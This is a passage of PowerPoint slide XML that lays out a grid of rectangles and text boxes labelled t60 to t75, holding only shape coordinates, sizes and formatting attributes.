            <a:off x="5309082" y="476805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9" name="Rectangle 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960905"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0" name="Rectangle 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6614981" y="476805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1" name="Rectangle 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270181"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2" name="Rectangle 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7923692"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3" name="Rectangle 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578042"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4" name="Rectangle 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233318"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5" name="Rectangle 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9890881"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6" name="Rectangle 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546081"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7" name="Rectangle 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11203489"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9" name="TextBox 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475982" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t60</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="TextBox 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2115363" y="4861608"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t61</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="TextBox 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790711" y="4861608"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t62</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="TextBox 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3430409" y="4855303"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t63</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="TextBox 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074681" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t64</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="TextBox 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4739232" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t65</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="TextBox 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5406288" y="4859804"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t66</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="TextBox 136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049581" y="4855303"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t67</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="TextBox 137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6697149" y="4849828"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t68</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="TextBox 138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7349810" y="4862876"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t69</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="TextBox 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8016630" y="4854020"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t70</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="TextBox 141"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8669182" y="4857391"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t71</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="TextBox 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9307330" y="4858264"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t72</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="TextBox 143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9962530" y="4853515"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t73</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="TextBox 144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617730" y="4869179"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t74</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="TextBox 145"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11265763" y="4857884"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t75</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="699081455"/>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0480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Rectangle 7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Rectangle 72"/>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Rectangle 74"/>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Rectangle 75"/>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Rectangle 83"/>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6" name="Rectangle 85"/>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Rectangle 87"/>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Rectangle 88"/>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Rectangle 89"/>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1" name="Rectangle 90"/>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1381173" y="166408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2036479" y="166253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91679" y="166253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Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346879" y="166253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3999010" y="166253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7" name="Rectangle 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654210"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8" name="Rectangle 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309718" y="166253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Rectangle 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961541"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Rectangle 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615617" y="166253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1" name="Rectangle 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270817"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2" name="Rectangle 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924328"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3" name="Rectangle 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578678"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Rectangle 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233954"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3" name="Rectangle 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9891517"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4" name="Rectangle 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546717"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5" name="Rectangle 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11204125"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6" name="Rectangle 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1381173" y="1148398"/>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7" name="Rectangle 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036479" y="1146847"/>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8" name="Rectangle 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2691679" y="1146847"/>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9" name="Rectangle 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346879" y="1146846"/>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0" name="Rectangle 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3999010" y="114684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1" name="Rectangle 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654210"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2" name="Rectangle 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309718" y="114684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3" name="Rectangle 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5961541"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4" name="Rectangle 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615617" y="114684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5" name="Rectangle 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270817"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6" name="Rectangle 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924328"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7" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578678"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8" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233954"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9" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9891517"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0" name="Rectangle 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546717"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1" name="Rectangle 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11204125"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2" name="Rectangle 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380537" y="476960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3" name="Rectangle 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2035843" y="476805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4" name="Rectangle 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2691043" y="476805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5" name="Rectangle 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346243" y="476805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6" name="Rectangle 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3998374" y="476805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7" name="Rectangle 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4653574"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8" name="Rectangle 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309082" y="476805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9" name="Rectangle 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5960905"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0" name="Rectangle 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6614981" y="476805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1" name="Rectangle 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7270181"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2" name="Rectangle 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7923692"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3" name="Rectangle 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578042"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4" name="Rectangle 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9233318"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5" name="Rectangle 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9890881"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6" name="Rectangle 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10546081"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7" name="Rectangle 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11203489"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9" name="TextBox 128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475982" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t60</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="TextBox 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2115363" y="4861608"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t61</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="TextBox 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790711" y="4861608"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t62</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="TextBox 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3430409" y="4855303"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t63</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="TextBox 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074681" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t64</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="TextBox 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4739232" y="4862672"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t65</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="TextBox 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5406288" y="4859804"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t66</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="TextBox 136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049581" y="4855303"/>
            <a:ext cx="501357" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>t67</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
